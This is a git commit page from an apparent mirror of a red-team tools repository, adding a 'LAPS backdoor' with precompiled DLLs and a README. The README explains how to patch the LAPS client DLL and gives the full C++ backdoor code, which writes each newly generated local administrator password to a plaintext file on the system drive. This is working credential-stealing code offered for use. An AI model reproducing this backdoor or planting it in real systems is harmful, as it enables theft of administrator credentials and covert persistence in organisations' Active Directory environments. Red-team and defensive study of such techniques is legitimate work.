Git
/
mgeeky-Penetration-Testing-Tools
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added LAPS backdoor.

This commit is contained in:
mb 2018-12-18 23:20:18 +01:00
parent 42f44fde77
commit f27ae78043
4 changed files with 76 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
red-teaming/LAPS-Backdoor/AdmPwd.cpp.diff Normal file
View File

Binary file not shown.

76
red-teaming/LAPS-Backdoor/README.md Normal file
View File

@ -0,0 +1,76 @@
### Explanation
This is a very simple backdoor for LAPS (Local Administrator Password Solution) Client-Side Extension (CSE) worker DLL. That DLL is responsible for processing Group Policy updates and whenever currently set local administrator's password is about to expire (or it was explicitly set as expired on DC), it re-generates password, set it up and reports it back to the AD Computer's object.
### How it works
Our approach is to add couple of lines of code to hijack new password being reported to the Active Directory and write it out to %SystemRoot%\laps-new-password.txt file.
One can find already compiled DLLs for x86 and x64, working for LAPS client version 6.2.0.0 .
In case manual compilation is needed, one can compile original [AdmPwd's project DLL](https://github.com/GreyCorbel/admpwd), add below code and then compile it.
### Requirements
- In order to plant that DLL you will need to have write permissions on the %PROGRAMFILES%\LAPS\CSE directory.
- Then you will have to wait until password reset event takes place - which can happen:
- upon current password expiration
- when explicitly resetted by authorized principal.
Above requirements effectively lower risk introduced by backdooring LAPS CSE.
```
//it's time to change the password
PasswordGenerator gen(config.PasswordComplexity, config.PasswordLength);
gen.Generate();
LPCTSTR newPwd = gen.Password;
//report new password and timestamp to AD
GetSystemTimeAsFileTime(&currentTime);
LogData.dwID = S_REPORT_PWD;
LogData.hr = comp.ReportPassword(newPwd, &currentTime, config.PasswordAge);
// --------------------
// Backdoor
HANDLE outFile;
WCHAR *buff = new WCHAR[512];
if (buff) {
if (GetEnvironmentVariableW(L"SystemDrive", buff, 512)){
wcscat_s(buff, 512, L"\\laps-new-password.txt");
outFile = CreateFileW(
buff,
GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (outFile != static_cast<HANDLE>(INVALID_HANDLE_VALUE)) {
DWORD written = 0;
wcscpy_s(buff, 512, newPwd);
wcscat_s(buff, 512, L"\r\n");
WriteFile(
outFile,
buff,
sizeof(WCHAR) * wcslen(buff),
&written,
NULL
);
CloseHandle(outFile);
}
}
delete[] buff;
}
// --------------------
```

BIN
red-teaming/LAPS-Backdoor/x64/admpwd.dll Normal file
View File

Binary file not shown.

BIN
red-teaming/LAPS-Backdoor/x86/admpwd.dll Normal file
View File

Binary file not shown.